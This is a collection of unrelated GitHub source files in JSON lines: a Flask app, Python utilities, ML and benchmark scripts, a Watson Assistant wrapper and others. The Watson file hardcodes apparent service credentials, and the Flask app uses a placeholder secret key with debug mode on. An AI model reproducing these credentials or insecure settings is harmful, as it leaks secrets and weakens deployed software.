\"filesystem\"\napp.config[\"SECRET_KEY\"] = 'super secret key'\napp.config[\"SESSION_FILE_DIR\"] = \"./.flask_session/\"\napp.config['SESSION_COOKIE_SAMESITE'] = 'None'\napp.config['SESSION_COOKIE_SECURE'] = True\n\nSession(app)\n\n@app.route('/.images/')\ndef send_image(path):\n return send_from_directory('.images', path)\n\n@app.route('/login/', methods=['GET'])\ndef login(code):\n session['access_token'] = get_access_token(code)\n\n response = get_database_data(session['access_token'])\n return jsonify(response.json()), 200\n\n@app.route('/add-page', methods=['POST'])\ndef add_page():\n data = get_paper_info(request.json.get('url'))\n if data == None:\n return jsonify({'error': 'Invalid URL'}), 400\n\n data['url'] = request.json.get('url')\n pdf_path = download_paper_pdf(data['id'])\n img_path = download_paper_image(pdf_path)\n data['summary'] = get_summary(data)\n\n response = create_page(session['access_token'], request.json.get('database_id'), data)\n\n if response.status_code == 200:\n response_data = response.json()\n response_data[\"img_path\"] = f\"http://localhost:5000/{img_path}/image1.png\"\n 
return jsonify(response_data), 200\n else:\n return jsonify(response.json()), 400\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"tenten0727/paper_to_notion","sub_path":"flask-backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34668925761","text":"import os\nimport subprocess\n\ndef is_exe(fpath):\n \"\"\"Returns True if the given path is executable\"\"\"\n return os.path.exists(fpath) and os.access(fpath, os.X_OK)\n\ndef which(program):\n \"\"\"Mimics the unix command ``which``. Taken from:\n http://stackoverflow.com/a/377028/624900\n \n :param program: A name of a command or an absolute path\n \"\"\"\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\ndef abspath_join(*args):\n \"\"\"Joins multiple paths together and returns the absolute path\"\"\"\n return os.path.abspath(os.path.join(*args))\n\ndef run_command(command, **kwargs):\n \"\"\"Runs the given command.\"\"\"\n added_env = kwargs.pop('added_env', {})\n if len(added_env) > 0:\n env = kwargs.pop('env', {})\n print(\"Added environment variables for command:\")\n print(\" -- \" + \"\\n -- \".join(\"%s=%s\" % (k,v) for k,v in (list(env.items()) + list(added_env.items()))))\n # list() so this also works on Python 3, where items() returns views\n env = dict(list(env.items()) + list(added_env.items()) + list(os.environ.items()))\n kwargs['env'] = env\n print(\"Running command:\\n === \" + \" \".join(command))\n return subprocess.call(command, **kwargs)\n\ndef hg_clone(url, dest, tag=None):\n \"\"\"Clones a mercurial repository\n \n :param url: URL of the repo\n :param dest: Destination directory on disk\n :param tag: Mercurial tag to check out (optional)\n \"\"\"\n command = [\"hg\", \"clone\", url]\n if tag is not None:\n command.append(\"-u\")\n command.append(tag)\n command.append(dest)\n run_command(command)\n\ndef svn_co(url, dest):\n \"\"\"Checks out a Subversion repository\n \n :param url: URL of subversion repo\n \"\"\"\n command = [\"svn\", \"checkout\", url, dest]\n run_command(command)\n\ndef mkdir(path, ensure=True):\n \"\"\"Creates the given directory path if it doesn't exist. 
Raises\n OSError if ensure is True and the directory creation failed.\n \n :param path: the path to create\n :param ensure: ensure the directory is created\n \"\"\"\n try:\n os.mkdir(path)\n print(\"Created directory: '%s'\" % path)\n except OSError:\n pass\n \n if ensure and not os.path.isdir(path):\n raise OSError(\"Failed to create the directory '%s'.\" % path)\n\ndef tail( f, window=20 ):\n \"\"\"Unix tail for python\n Taken from http://stackoverflow.com/a/136368/624900\n \"\"\"\n BUFSIZ = 1024\n f.seek(0, 2)\n bytes = f.tell()\n size = window\n block = -1\n data = []\n while size > 0 and bytes > 0:\n if (bytes - BUFSIZ > 0):\n # Seek back one whole BUFSIZ\n f.seek(block*BUFSIZ, 2)\n # read BUFFER\n data.append(f.read(BUFSIZ))\n else:\n # file too small, start from begining\n f.seek(0,0)\n # only read what was not read\n data.append(f.read(bytes))\n linesFound = data[-1].count('\\n')\n size -= linesFound\n bytes -= BUFSIZ\n block -= 1\n return '\\n'.join(''.join(data).splitlines()[-window:])\n","repo_name":"jterrace/js.js","sub_path":"builder/jsjs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1078,"dataset":"github-code","pt":"53"} +{"seq_id":"12644833170","text":"# Date Completed: 1st July 2022\n# Problem Link: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n# References:\n# 1. https://dxmahata.gitbooks.io/leetcode-python-solutions/content/best_time_to_buy_and_sell_stock.html\n\n###################################################\n# more efficient (copied from reference 1)\n###################################################\nclass Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if len(prices) == 0:\n return 0\n else:\n max_profit = 0\n min_price = prices[0]\n for i in range(len(prices)):\n profit = prices[i] - min_price\n max_profit = max(profit, max_profit)\n min_price = min(min_price, prices[i])\n\n return max_profit\n\n########################\n# brute force method\n########################\n# class Solution:\n# def maxProfit(self, prices: List[int]) -> int:\n# index = None\n# maxProfit = 0\n# for x in range(len(prices)):\n# for y in range(x + 1, len(prices)):\n# if prices[y] - prices[x] > maxProfit:\n# maxProfit = prices[y] - prices[x]\n \n# return maxProfit","repo_name":"egzj/sdesheet","sub_path":"day01 ( Arrays )/stock_buy_and_sell.py","file_name":"stock_buy_and_sell.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27724935554","text":"# The RGB LED hardware is WS2813, which can be controlled by neopixel library.\n# from https://learn.adafruit.com/circuitpython-essentials/circuitpython-neopixel\n\n# Requires:\n# lib/neopixel.mpy\n\nimport time\nimport board\nimport neopixel\n\npixel_pin = board.GP3\nnum_pixels = 1\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.3, auto_write=False)\n\nRED = (255, 0, 0)\nYELLOW = (255, 150, 0)\nGREEN = (0, 255, 0)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nPURPLE = (180, 0, 255)\n\nwhile True:\n pixels.fill(RED)\n pixels.show()\n time.sleep(1)\n pixels.fill(GREEN)\n pixels.show()\n time.sleep(1)\n pixels.fill(BLUE)\n pixels.show()\n 
time.sleep(1)\n","repo_name":"makezurich/makezurich-badge-2023-circuitpython","sub_path":"06-grove-starterkit/rgb/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"26879261482","text":"import json\r\nimport watson_developer_cloud, copy\r\nfrom time import gmtime, strftime\r\n\r\n\r\nassistant = watson_developer_cloud.AssistantV1\\\r\n(\r\n username=\"04f281dd-5038-4b53-a6ab-533cc717544f\",\r\n password=\"jo8vla8Otw2H\",\r\n version=\"2018-02-16\"\r\n)\r\n#workSpaceID\r\nw_id = 'dc846ce4-56c9-408f-a37c-9aef0a7daf91'\r\n\r\ndef createIntent(name):\r\n response = assistant.create_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n print(\"WATSON ASSISTANT CREATED INTENT \", name)\r\n\r\ndef getIntentList():\r\n response = assistant.list_intents\\\r\n (\r\n workspace_id=w_id\r\n )\r\n return response\r\ndef getIntent(name):\r\n response = assistant.get_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n return response\r\n\r\ndef add_utterance(text,intent):\r\n response = assistant.update_intent\\\r\n (\r\n workspace_id=w_id,\r\n intent=intent,\r\n new_examples=[\r\n {'text': text}\r\n ],\r\n new_description='Updated intent on' + str(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\r\n )\r\n print(\"WATSON ASSISTANT ADDED UTTERANCE IN INTENT \", intent)\r\n\r\ndef deleteIntent(name):\r\n response = assistant.delete_intent\\\r\n (\r\n workspace_id = w_id,\r\n intent = name\r\n )\r\n print(\"WATSON ASSISTANT DELETED INTENT \", name)\r\n\r\n\r\ndef add_utterances(input,intent):\r\n phrases = []\r\n example = {\"text\": \"\"}\r\n for text in input:\r\n example[\"text\"]=text\r\n phrases.append(copy.deepcopy(example))\r\n response = assistant.update_intent \\\r\n (\r\n workspace_id=w_id,\r\n intent=intent,\r\n new_examples=phrases,\r\n new_description='Updated intent on' + str(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\r\n )\r\n print(\"WATSON ASSISTANT ADDED UTTERANCES IN INTENT \", intent)\r\n\r\ndef resetApplication():\r\n intentList = getIntentList()\r\n intentList=intentList[\"intents\"]\r\n for intentObject in intentList:\r\n deleteIntent(intentObject[\"intent\"])\r\n print(\"WATSON ASSISTANT RESET DONE\")\r\n\r\ndef getPrediction(userInput):\r\n response = assistant.message\\\r\n (\r\n workspace_id=w_id,\r\n input={\r\n 'text': userInput\r\n }\r\n )\r\n return response\r\n","repo_name":"pkgishere/EmNLP_DEMO","sub_path":"WatsonAssistantIntent.py","file_name":"WatsonAssistantIntent.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34462801884","text":"\nimport sys\nimport os\nfrom ctypes import CDLL, c_int, c_void_p, c_float\nfrom numpy.ctypeslib import ndpointer\nimport numpy as np\n\ninterface_path = os.path.abspath('.')\n\nPWM2d_AMD_dll = CDLL(interface_path + '/cpp_src/HIP/PWM_hip.so')\n\nPWM2d_AMD = PWM2d_AMD_dll.extrapAndImag_amd_cu\nPWM2d_AMD.restype = c_void_p\nPWM2d_AMD.argtypes = [c_int, c_int, c_int, c_int,\n c_int, c_int, c_int,\n c_float, c_int, c_float, c_int,\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.complex64, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.complex64, flags=(\"C\",\"A\") ),\n ndpointer( dtype=np.float32, flags=(\"C\",\"A\") 
)]\n","repo_name":"ahadji05/imaging2D_PSPI","sub_path":"interface/interface_hip.py","file_name":"interface_hip.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12658826596","text":"import collections\nimport itertools\nimport math\nimport decimal\nimport bisect\ndef I(): return input()\ndef IS(): return input().split()\ndef II(): return int(input())\ndef IIS(): return map(int,input().split())\ndef LIIS(): return list(map(int,input().split()))\n##############################################################################\nn=II()\nR=[]\nG=[]\nB=[]\nfor i in range(n*2):\n a,c=input().split()\n if c==\"R\":\n R.append(int(a))\n elif c==\"B\":\n B.append(int(a))\n else:\n G.append(int(a))\nif len(R)%2==0 and len(B)%2==0:\n print(0)\n exit()\ndef solve(a,b):\n res=10**18\n for i in range(len(a)):\n ind=bisect.bisect_left(b,a[i])\n try:\n res=min(res,abs(a[i]-b[ind]))\n except:\n pass\n try:\n if ind>0:\n res=min(res,abs(a[i]-b[ind-1]))\n except:\n pass\n return res\nR.sort()\nB.sort()\nG.sort()\nif len(R)%2==1 and len(B)%2==1:\n print(min(solve(R,B),solve(G,R)+solve(B,G)))\n exit()\nelif len(G)%2==1 and len(B)%2==1:\n print(min(solve(G,B),solve(R,B)+solve(G,R)))\n exit()\nelif len(G)%2==1 and len(R)%2==1:\n print(min(solve(G,R),solve(R,B)+solve(G,B)))\n exit()\n","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/arc121/arc121_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71683648487","text":"def input_to_codes(string):\n return [int(i) for i in string.split(',')]\n\n\ndef parse_op(c):\n parsed = f\"{c:05d}\"\n opcode = int(parsed[-2:])\n modes = [int(i) for i in parsed[0:3]]\n return modes + [opcode]\n\n\ndef get_value(mode, inp, memory):\n if mode == 0:\n return memory[inp]\n return inp\n\n\ndef run(codes, user_input):\n i = 0\n diagnostic = []\n if not hasattr(user_input, '__next__'):\n user_input = iter([user_input])\n while codes[i] != 99:\n _, mode2, mode1, opcode = parse_op(codes[i])\n d = codes[i + 3]\n\n # add\n if opcode == 1:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a + b\n i += 4\n # multiply\n elif opcode == 2:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a * b\n i += 4\n # provide input\n elif opcode == 3:\n try:\n codes[codes[i + 1]] = next(user_input)\n except StopIteration:\n return diagnostic and int(''.join(diagnostic)) or 0\n i += 2\n # output value\n elif opcode == 4:\n diagnostic.append(str(get_value(mode1, codes[i + 1], codes)))\n i += 2\n # jump if true\n elif opcode == 5:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n i = a and b or i + 3\n # jump if false\n elif opcode == 6:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n i = not a and b or i + 3\n # less than\n elif opcode == 7:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a < b and 1 or 0\n i += 4\n # equal\n elif opcode == 8:\n a = get_value(mode1, codes[i + 1], codes)\n b = get_value(mode2, codes[i + 2], codes)\n codes[d] = a == b and 1 or 0\n i += 4\n\n val = int(''.join(diagnostic))\n print(val)\n return 
val\n","repo_name":"andyhoneycutt/advent-of-code","sub_path":"python/2019/intcode.py","file_name":"intcode.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20147689712","text":"# In this comparison we should compare:\n# 1. naive single-threaded NumPy\n# 2. MKL-accelerated NumPy\n# 3. CUDA-accelerated CuPy\n# 4. CUDA and Tensor Cores-accelerated CuPy\n# 5. JAX multi-gpu\n#\n# Workloads:\n# * generating big random matrix\n# * multiplying big matrices\n# * moving average computation\n# * generating big random matrix\n#\n# Difference between CuPy and NumPy:\n# https://docs.cupy.dev/en/stable/user_guide/difference.html\n\nimport logging\nimport os\nimport pathlib\nfrom dataclasses import dataclass\nfrom sys import argv\nfrom typing import Generator, Optional, List\nimport numpy.distutils.system_info as sysinfo\n\n\nfrom shared import Bench, run_persisted_benchmarks\n\n\ndef benchmarks_for_backend(class_: type, class_name: str, size: int, **kwargs) -> Generator[Bench, None, None]:\n\n funcs = [\n ('Generate', lambda: globals().update({'m': class_(side=size, **kwargs)})),\n ('Matrix Multiply', lambda: globals()['m'].matrix_multiply()),\n ('Moving Averages', lambda: globals()['m'].moving_average()),\n ('Pearson Correlation', lambda: globals()['m'].pearson_correlations()),\n ('2D FFT', lambda: globals()['m'].fft2d()),\n ('Matrix SVD', lambda: globals()['m'].singular_decomposition()),\n ('Array Median', lambda: globals()['m'].flat_median()),\n ('Array Sorting', lambda: globals()['m'].flat_sort()),\n ('Array Summation', lambda: globals()['m'].flat_sum()),\n ]\n\n for func_name, func in funcs:\n yield Bench(\n operation=func_name,\n backend=class_name,\n dataset=f'{size}x{size}',\n dataset_bytes=(size ** 2)*4,\n func=func,\n )\n\n\ndef benchmarks_for_sizes(class_: type, class_name: str, side_sizes: List[int], **kwargs) -> Generator[Bench, None, None]:\n for size in side_sizes:\n yield from benchmarks_for_backend(class_, class_name, size, **kwargs)\n\n\ndef available_benchmarks(\n cuda_device: int = 0,\n logger: logging.Logger = logging.getLogger(),\n) -> Generator[Bench, None, None]:\n\n # Swap the backend, if GPU is selected\n sizes = [512 * 2**i for i in range(0, 6)]\n\n try:\n import cupy\n cuda_device = int(cuda_device)\n if 'CUPY_ACCELERATORS' not in os.environ.keys():\n os.environ['CUPY_ACCELERATORS'] = \"cub,cutensor\"\n if 'CUPY_TF32' not in os.environ.keys():\n os.environ['CUPY_TF32'] = '1'\n\n devices = cupy.cuda.runtime.getDeviceCount()\n assert devices > 0, 'No CUDA-powered device found'\n logger.info('Found {} CUDA devices'.format(devices))\n\n cupy.cuda.runtime.setDevice(cuda_device)\n specs = cupy.cuda.runtime.getDeviceProperties(cuda_device)\n name = specs['name'].decode()\n logger.info('Using CuPy with : {}'.format(name))\n\n from via_cupy import ViaCuPy\n yield from benchmarks_for_sizes(ViaCuPy, 'CuPy', sizes)\n except ModuleNotFoundError:\n logger.info('CuPy not found, skipping')\n\n try:\n import torch\n logger.info(f'Using Torch with : {torch.cuda.get_device_name()}')\n\n from via_torch import ViaTorch\n yield from benchmarks_for_sizes(ViaTorch, 'Torch', sizes)\n except ModuleNotFoundError:\n logger.info('Torch not found, skipping')\n \n try:\n os.environ['XLA_PYTHON_CLIENT_PREALLOCATE']='false'\n import jax\n logger.info(f'Using JAX with : {jax.devices()}')\n\n from via_jax import ViaJAX\n yield from benchmarks_for_sizes(ViaJAX, f'JAX/{jax.device_count()}', sizes, 
device_count=jax.device_count())\n yield from benchmarks_for_sizes(ViaJAX, 'JAX/1', sizes, device_count=1)\n except ModuleNotFoundError:\n logger.info('JAX not found, skipping')\n\n try:\n import numpy as np\n libs = set(sysinfo.get_info('blas')['libraries'])\n libs_str = ','.join(libs)\n logger.info(f'Using NumPy with BLAS versions: {libs_str}')\n\n from via_numpy import ViaNumPy\n yield from benchmarks_for_sizes(ViaNumPy, 'NumPy', sizes)\n except ModuleNotFoundError:\n logger.info('NumPy not found, skipping')\n\n\nif __name__ == '__main__':\n benches = list(available_benchmarks())\n backends = {x.backend for x in benches}\n datasets = {x.dataset for x in benches}\n results_path = os.path.join(\n pathlib.Path(__file__).resolve().parent,\n 'report/results.json'\n )\n\n print('Available backends: ', backends)\n print('Available datasets: ', datasets)\n run_persisted_benchmarks(benches, 10, results_path)\n","repo_name":"unum-cloud/udsb","sub_path":"matrix/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"5830049080","text":"import random\nimport math\nimport typing\nfrom typing import Any\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\n\nfrom models.base import BaseDataset\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model) # 64*512\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1) # 64*1\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model)) # 256 model/2\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0) # 1*max_len*d_model\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x): # [batch,seq,d_model]\n x = x + Variable(self.pe[:, : x.size(1)], requires_grad=False)\n return self.dropout(x)\n\n\nclass AbsolutePositionalEncoding(nn.Module):\n def __init__(self, hidden_size, max_len) -> None:\n super().__init__()\n self.pos_embed = nn.Parameter(torch.zeros(1, max_len, hidden_size))\n nn.init.kaiming_normal_(self.pos_embed)\n\n def forward(self, x):\n x += self.pos_embed.expand(x.shape[0], -1, -1)\n return x\n\n\n\nclass GlobalAveragePooling1D(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, x):\n # x shape: [batch_size, seq_len, channels]\n x = torch.mean(x, dim=self.dim)\n return x\n\n\ndef sliding_window(seq, window_size, stride):\n result = []\n if window_size > len(seq):\n return [seq]\n for i in range(0, len(seq) - window_size + 1, stride):\n subseq = seq[i : i + window_size]\n result.append(subseq)\n return result\n\n\nclass TransformerBlock(nn.Module):\n def __init__(self, embed_dim, num_heads, ff_dim, dropout_rate=0.1):\n super(TransformerBlock, self).__init__()\n self.att = nn.MultiheadAttention(embed_dim, num_heads, dropout=0.1, batch_first=True)\n self.ffn = nn.Sequential(nn.Linear(embed_dim, ff_dim), nn.ReLU(), nn.Linear(ff_dim, embed_dim))\n self.layernorm1 = nn.LayerNorm(embed_dim)\n self.layernorm2 = nn.LayerNorm(embed_dim)\n self.dropout1 = nn.Dropout(dropout_rate)\n self.dropout2 = nn.Dropout(dropout_rate)\n\n def forward(self, inputs):\n attn_output = 
self.att(inputs, inputs, inputs)[0]\n # print(len(attn_output))\n attn_output = self.dropout1(attn_output)\n out1 = self.layernorm1(inputs + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output)\n return self.layernorm2(out1 + ffn_output)\n\n\ndef get_data_loader(\n filenames: typing.Iterable,\n dateset_cls=BaseDataset,\n truncation=None,\n batch_size=32,\n shuffle=True,\n num_workers=2,\n promoter_embedding=None,\n):\n train_filename, valid_filename, test_filename = filenames\n test_dateset = dateset_cls(\n test_filename,\n truncation=truncation,\n promoter_embedding=promoter_embedding,\n )\n valid_dataset = dateset_cls(\n valid_filename,\n truncation=truncation,\n promoter_embedding=promoter_embedding,\n )\n\n return (\n DataLoader(\n dateset_cls(train_filename, truncation=truncation, promoter_embedding=promoter_embedding),\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n drop_last=True,\n prefetch_factor=10,\n ),\n DataLoader(\n valid_dataset,\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n ),\n DataLoader(\n test_dateset,\n batch_size,\n shuffle,\n num_workers=num_workers,\n persistent_workers=True,\n pin_memory=True,\n ),\n )\n\n\ndef load_submodel(model, state_dict, state_dict_submodel_name, model_submodel_name):\n submodel_state_dict = {\n k.replace(state_dict_submodel_name + \".\", \"\"): v\n for k, v in state_dict.items()\n if k.startswith(state_dict_submodel_name)\n }\n attr = getattr(model, model_submodel_name)\n if hasattr(attr, \"load_state_dict\"):\n attr.load_state_dict(submodel_state_dict)\n else:\n # print(type(attr), type(submodel_state_dict))\n # print(submodel_state_dict)\n attr.data = submodel_state_dict[state_dict_submodel_name]","repo_name":"doveppp/MultimodalExpression","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148556205","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Imports\n\n# In[26]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom keras import layers, Input, Model\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n# ### Loading data\n\n# In[27]:\n\n\ndata_dir = '../input/'\n\n# In[28]:\n\n\ntrain_raw = pd.read_csv(f'{data_dir}train.csv')\ntrain_raw.head()\n\n# In[29]:\n\n\ntest_raw = pd.read_csv(f'{data_dir}test.csv')\ntest_raw.head()\n\n# In[30]:\n\n\ntrain_raw.shape, test_raw.shape\n\n# In[31]:\n\n\ntrain_raw.isnull().sum().sum(), test_raw.isnull().sum().sum()\n\n# So there are no missing values in either training or test set.\n\n# ### Target distribution\n\n# In[32]:\n\n\nsns.countplot(train_raw.target)\nplt.show()\n\n# In[33]:\n\n\ntrain_raw.target.value_counts()\n\n# Looks like class labels are uniformly distributed in training data.\n\n# ### Train-validation split\n# \n# Let's split our training set such that 15% of data are used for validation -\n\n# In[34]:\n\n\ntrn_x, valid_x, trn_y, valid_y = train_test_split(train_raw.drop(['id', 'target'], axis=1), train_raw.target, random_state=33, test_size=0.15)\ntrn_x.shape, valid_x.shape, trn_y.shape, valid_y.shape\n\n# ### Categorical Feature\n\n# In[35]:\n\n\ntrn_wheezy = 
pd.get_dummies(trn_x['wheezy-copper-turtle-magic'])\nvalid_wheezy = pd.get_dummies(valid_x['wheezy-copper-turtle-magic'])\ntest_wheezy = pd.get_dummies(test_raw['wheezy-copper-turtle-magic'])\n\ntrn_wheezy.shape, valid_wheezy.shape, test_wheezy.shape\n\n# In[36]:\n\n\ntrn_x.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\nvalid_x.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\ntest_raw.drop('wheezy-copper-turtle-magic', axis=1, inplace=True)\n\n# ### Normalize features\n\n# In[37]:\n\n\nsc = StandardScaler()\ntrn_x = sc.fit_transform(trn_x)\n\nvalid_x = sc.transform(valid_x)\ntest_x = sc.transform(test_raw.drop('id', axis=1))\n\n# In[38]:\n\n\ntrn_x = np.concatenate([trn_x, trn_wheezy.values], axis=1)\nvalid_x = np.concatenate([valid_x, valid_wheezy.values], axis=1)\ntest_x = np.concatenate([test_x, test_wheezy.values], axis=1)\n\n# ### Model\n\n# In[39]:\n\n\ndef build_model():\n inp = Input(shape=(trn_x.shape[1],), name='input')\n x = layers.Dense(1000, activation='relu')(inp)\n x = layers.Dropout(0.65)(x)\n x = layers.Dense(750, activation='relu')(x)\n x = layers.Dropout(0.65)(x)\n x = layers.Dense(500, activation='relu')(x)\n x = layers.Dropout(0.6)(x)\n x = layers.Dense(1, activation='sigmoid')(x)\n \n model = Model(inp, x)\n model.compile(optimizer='adam',\n loss='binary_crossentropy', metrics=['acc'])\n \n return model\n\nmodel = build_model()\nmodel.summary()\n\n# ### Training\n\n# In[40]:\n\n\nweights_path = f'weights.best.hdf5'\nval_loss_checkpoint = ModelCheckpoint(weights_path, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\nreduceLR = ReduceLROnPlateau(monitor='val_loss', patience=5, verbose=1, mode='min', min_lr=1e-6)\n\n# In[41]:\n\n\nmodel.fit(trn_x, trn_y, epochs=80, validation_data=(valid_x, valid_y),\n callbacks=[val_loss_checkpoint, reduceLR], batch_size=512, verbose=1)\n\n# In[43]:\n\n\nmodel.load_weights(weights_path)\n\n# ### roc_auc_score on validation data\n\n# In[44]:\n\n\nval_preds = model.predict(valid_x, batch_size=2048, verbose=1)\n\n# In[45]:\n\n\nroc_auc_score(valid_y.values, val_preds.reshape(-1))\n\n# ### Prediction on test data\n\n# In[46]:\n\n\ntest_preds = model.predict(test_x, batch_size=2048, verbose=1)\n\n# In[47]:\n\n\nsub_df = pd.read_csv(f'{data_dir}sample_submission.csv')\nsub_df.target = test_preds.reshape(-1)\nsub_df.head()\n\n# In[48]:\n\n\nsub_df.to_csv('solution.csv', index=False)\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample949.py","file_name":"sample949.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11199361668","text":"import requests\nimport json\n\ndef check(id, point, expiry, yyyymmddhhmmss):\n token = f'{id}${expiry}${yyyymmddhhmmss}'\n vo = {\n 'user_id': id,\n 'point': int(point),\n 'token': token,\n 'memo': '테스트 포인트 차감'\n }\n\n header = {\n \"Content-Type\": \"application/json; charset=utf-8\"\n }\n\n response = requests.post(\"http://127.0.0.1:5000/token/check\", data=json.dumps(vo), headers=header,\n timeout=40)\n print(response.content)\n print(response.json())\n return response.json()\n","repo_name":"gkwlsdn17/StorePaymentSystem","sub_path":"SPS/app/module/token_check.py","file_name":"token_check.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2680581009","text":"\nimport numpy as np\nfrom .feature import Feature\nfrom .schedule import 
Always\n\n\nclass Strategy:\n def __init__(self, name, features=None, algo=None, schedule=None):\n self.name = name\n self.features = features # type: List[Feature]\n self.recursive_features = []\n self.discrete_features = []\n self.algo = algo\n self.schedule = schedule\n self.lookback = 0\n self.epoch = 0\n self.input = {}\n self.tickers = None\n\n def setup(self, tickers):\n self.tickers = tickers\n\n # setup algo\n self.algo.setup(tickers, self.features)\n\n # setup schedule\n if self.schedule is None:\n self.schedule = Always()\n\n # setup regular data\n self.input['time'] = np.empty(0, dtype='datetime64[ns]')\n self.input['close'] = np.empty((0, len(tickers)))\n\n # setup feature data\n if self.features is not None:\n self.lookback = max([x.lookback for x in self.features])\n for feature in self.features:\n self.input[feature.name] = feature\n\n if feature.is_recursive:\n self.recursive_features.append(feature)\n else:\n self.discrete_features.append(feature)\n\n return self\n\n def __call__(self, datum):\n \"\"\"\n Returns relative weight\n\n :param datum:\n :return:\n \"\"\"\n # update regular data\n self.input['time'] = np.append(self.input['time'], datum[0])\n self.input['close'] = self.append_data(self.input['close'], datum[1]['close'])\n\n # only recursive needed updating every bar\n for feature in self.recursive_features:\n feature(self.input)\n\n # calculate weight\n weights = None # None weight means no change\n if self.epoch > self.lookback and self.schedule(datum[0]):\n # update features\n for feature in self.discrete_features:\n feature(self.input)\n weights = self.algo(self.input) # input has references to features\n self.epoch += 1\n return weights\n\n def append_data(self, data, datum):\n return np.append(data[-self.lookback:], [datum], axis=0)\n","repo_name":"albertium/AlgoTrader","sub_path":"at/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30903883400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('editor', '0004_convert_endnotes'),\n ]\n\n operations = [\n 